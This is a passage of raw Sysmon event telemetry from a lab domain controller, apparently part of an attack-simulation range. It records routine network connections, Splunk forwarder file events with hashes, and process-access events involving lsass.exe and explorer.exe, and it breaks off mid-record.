354300x80000000000000001698253Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:46.091{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local57818- 23542300x80000000000000001698252Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:54.302{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E078A794C4C403639E9224D8CB3B8E0C,SHA256=F074C47F995BD993BD3AFB80001B6E64AAD99D2BEFD52B5A709174D6E6E4B82F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002234706Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:16.183{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9527048F4E90BEB09B88ABCB1CA6F3AA,SHA256=F6371DC8AB7BC36D6B886AE42CDAC15564FB185F40661AAB83DDDA86A8D0C623,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002234709Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:17.199{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=965ED16578B64BD16ED4D8A201F25F7F,SHA256=5EAAAC4F7B12F524E785E51AC998CB5D52300E7ADD789D613051FC725CD820E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002234708Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:17.184{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CACA85BA2A31EF3B9C2EE42605684967,SHA256=709E63E07A3242BC23C2D785751BCF7623FB3850DCC16586A720177135E95271,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002234707Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:05.917{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local54515- 23542300x80000000000000002234712Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:18.812{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=10F8F4FB45FD32AB05478CBA6FA206F6,SHA256=6A765E6C7DD6D809F236016134FE1FB920327BF3C2DBD89E4CF4CB55018D5F3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002234711Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:18.218{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90358BC3E4CB82AC0A8A95FBEB381568,SHA256=133431ED8BB01403B59B5FBB0BF71F3B6DA8B202F11D857B3E26044A61FC349D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002234710Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:07.293{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60100-false10.0.1.12-8000- 23542300x80000000000000002234713Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:19.246{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D60E02599F1F1B9E2B38CAC941EF7674,SHA256=CFF0FA44F17A75794DE055AE6E1064FE306323B42E93BEB850964DB40BED2893,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002234714Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:20.246{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A73649CECDA9E9D24FB07112025FEB61,SHA256=96DC96614DAE6B79C09795E02633A9774C9280AEFE127A9A1748025AF00C023F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002234715Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:21.277{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9618BAF694C417F9AE69F7FAD4884641,SHA256=F43F0DD270825D5359878D17ADE296492776530769B3C1D32161B4362FC1C9A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002234717Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:22.311{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29CF9ABA80AD47D7339D889B14F6B35C,SHA256=7B526A29BF6918DA88B7F3CBBE18374387E7126265941BC34C6037AFCBBBC4A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002234716Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:22.220{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5B147BA02EB4121F8B374FD3B2601B75,SHA256=C17F8AA5B464FA265840C34CCE99BF333B5AF0C34C0E66E3B4DFA38F074541F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002234719Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:23.340{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB5B7EED246538B1704979F29A517058,SHA256=D511248320FB6BEA7F8F20F1A2305D03BA08B647E53E190CDF30E14AE5AA0169,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002234718Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:12.372{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60101-false10.0.1.12-8000- 23542300x80000000000000002234722Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:24.371{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=389D942531D7A88EF17511DC7E145499,SHA256=A57B4C95B88A1D3CF2A5CF3E1F32A82695079EDDD6D18330FD1185B54FACAF69,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002234721Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:24.355{05ADC7E1-229D-6039-0B00-00000000AD01}85210068C:\Windows\system32\lsass.exe{05ADC7E1-2299-6039-0100-00000000AD01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31819|C:\Windows\system32\lsasrv.dll+2f177|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x80000000000000002234720Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:24.246{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=68DB23FF69CD5080ACE9E8FDBC06CBEF,SHA256=72D1FC10BF10745DAD7FA8EB51F10D8B9B6D96A7F0570231B0261002DB18B346,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002234724Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:25.402{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C35C57E480D6E05D88951C9657583433,SHA256=B62B338FA2B9DD165A50CCD0188ABC21FB81839C0F2F7D9D4BF42C7BFCBFA7A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002234723Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:25.293{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4A4077C35E36579C82B30C923115FB9C,SHA256=1F642257CEDF08B5DACC880F484FBF920BB12EEDEC4392D21C0F8E9A362694CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002234735Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:26.402{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A5B16966232818E05B2D04D945008C9,SHA256=BD3DBF2947299C38E5B5FE93B09F514DAFDF99C309479BC380785325ED3F353B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002234734Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:15.520{05ADC7E1-2299-6039-0100-00000000AD01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local60107-truefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local445microsoft-ds 354300x80000000000000002234733Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:15.520{05ADC7E1-2299-6039-0100-00000000AD01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local60107-truefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local445microsoft-ds 354300x80000000000000002234732Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:15.516{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local60106-truefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local49666- 354300x80000000000000002234731Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:15.516{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruetruefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local60106-truefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local49666- 354300x80000000000000002234730Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:15.515{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local60105-truefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local135epmap 354300x80000000000000002234729Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:15.515{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruetruefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local60105-truefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local135epmap 354300x80000000000000002234728Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:15.414{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-974.attackrange.local60104-false10.0.1.14win-dc-974.attackrange.local389ldap 354300x80000000000000002234727Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:15.414{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60104-false10.0.1.14win-dc-974.attackrange.local389ldap 354300x80000000000000002234726Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:15.406{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local60103-truefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local389ldap 354300x80000000000000002234725Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:15.406{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local60103-truefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local389ldap 23542300x80000000000000002234822Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.559{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD85B20425545B6ABD325F5B5FCF9B79,SHA256=A925BA0A48A0486F208EF8331BE9A6EB78B6E9E1ADCC460F31907AB7FA939DF1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002234821Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.199{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D31669E225739F2929213C4EF555C7DF,SHA256=8FD32AD4680438C99B0342C06889151B75920485264DE96102C31B585AAF90CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002234820Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.199{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1572EC0E5B6C73BDF0EB71A920A74DD2,SHA256=B3835D08895B0DC0705181614313C551D022147BA21D4908F9802009E145FF7B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002234819Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234818Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234817Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234816Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234815Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234814Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234813Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234812Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234811Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234810Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234809Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234808Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234807Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 